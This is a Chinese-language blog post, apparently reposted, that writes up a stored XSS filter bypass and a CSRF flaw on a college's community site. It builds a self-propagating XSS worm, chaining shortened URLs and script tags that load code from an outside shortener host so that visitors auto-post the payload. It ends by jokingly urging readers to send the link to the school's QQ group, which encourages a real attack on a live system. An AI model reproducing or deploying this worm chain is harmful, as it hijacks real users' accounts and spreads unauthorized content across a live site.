【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)
阿新 • • 發佈:2022-05-23
0x00 儲存XSS
1) 可繞過的XSS
給大家分享個漏洞案例,今天上午剛把電腦修好
某技術學院儲存XSS+CSRF(XSS繞過濾到蠕蟲攻擊)
註冊處:
http://xxx.edu.cn/meol/xxxx
需要註冊才能進入社群發表,先說下儲存XSS,過濾了,發現可繞過
儲存XSS:
http://xxx.edu.cn/meol/xxx?genre=80&type=0
他是先過濾再輸出,而不是輸出時過濾,從而導致可繞過
我們發現他輸入時就進行了過濾,直接替換
<script>alert('XSS')</script>
成功彈框:
0x01 CSRF配合XSS蠕蟲
同樣是這個位置,發表話題,改成get請求
得到連線:
CSRF:
http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE
點選連結會自動發表內容
我們縮短一下連結 網上有線上縮短的,縮短後連結http://suo.im/abc
構造一下csrf連線:
<script src=http://suo.im/abc></script>
(插入到網頁當中,當別人訪問你的個人中心,會自動發表一個內容)
接著我們繼續構造,找到CSRF漏洞處,把後面的內容替換為CSRF連結,也就是訪問此連線會自動發表內容
http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>
繼續縮短網址:
縮短後:http://suo.im/XXXX
這個時候我們再呼叫一下CSRF+XSS的地址:
<script src=http://suo.im/XXXX></script>
把這個連結插入到網頁當中即可完成XSS蠕蟲攻擊
當A訪問你的主頁時,A會發表和你一樣的內容,當B訪問A的主頁時,B會發表和A一樣的內容,同理,完成XSS蠕蟲攻擊
最後的思路就是自己構造個網站,加這個學校的QQ群,傳送連結哈哈。
對網安感興趣的關注下公眾號吧~